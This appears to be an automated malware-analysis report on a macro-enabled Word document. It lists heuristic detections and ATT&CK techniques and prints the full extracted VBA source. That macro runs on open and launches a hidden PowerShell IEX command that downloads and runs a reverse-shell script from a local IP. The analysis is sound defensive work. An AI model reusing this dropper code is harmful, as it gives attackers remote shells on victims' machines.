MALICIOUS
230
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1105 Ingress Tool Transfer
T1071.001 Web Protocols
The sample contains VBA macros that are triggered by the AutoOpen function. These macros utilize WScript.Shell and CreateObject to execute a PowerShell command. The command uses IEX to download and run a script from the URL http://192.168.2.120/reverse_shell_120_4444.ps1, which is likely intended to establish a reverse shell. The obfuscated nature of the PowerShell command and the use of a private IP address suggest a targeted attack.
Heuristics 7
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set objShell = CreateObject("Wscript.shell") objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + " IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')" -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
Set objShell = CreateObject("Wscript.shell") objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + " IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set objShell = CreateObject("Wscript.shell") objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + " IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://192.168.2.120/reverse_shell_120_4444.ps1 Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1570 bytes |
SHA-256: ad63d838bf026f0ea29e20d0e17b76658d3a00de4498f5dde273aaa3b3d06aae |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
#If VBA7 Then
'declare virtual key event listener
Private Declare PtrSafe Function GetAsyncKeyState Lib "user32" _
(ByVal vKey As Long) As Integer
#Else
'declare virtual key event listener
Private Declare PtrSafe Function GetAsyncKeyState Lib "user32" _
(ByVal vKey As Long) As Integer
#End If
Private Const VK_F9 = &H78
Sub AutoOpen()
checkDay
End Sub
Sub checkDay()
Do While Weekday(Now()) = vbTuesday
MsgBox "Today is Tuesday"
WaitUntilF9Key
'ElseIf Weekday(Now()) <> vbTuesday Then
'MsgBox "Today is not Tuesday"
'ElseIf Weekday(Now()) = vbThursday Then
'MsgBox "Today is Thursday"
'ElseIf Weekday(Now()) <> vbThursday Then
'MsgBox "Today is not Thursday"
'End If
Loop
End Sub
Sub WaitUntilF9Key()
Do Until GetAsyncKeyState(VK_F9)
DoEvents
Loop
Shello
End Sub
Function Shello()
Set objShell = CreateObject("Wscript.shell")
objShell.Run Chr(112) + "ower" + "shell.exe " + Chr(150) + "WindowStyle Hidden" + " IEX (New-Object Net.WebClient).DownloadString('http://192.168.2.120/reverse_shell_120_4444.ps1')"
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 19968 bytes |
SHA-256: 0767e5e5d5eea9055b5ccec6ff9a32f295159eb4fdbc6f8c53ef57fa4058e0bf |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.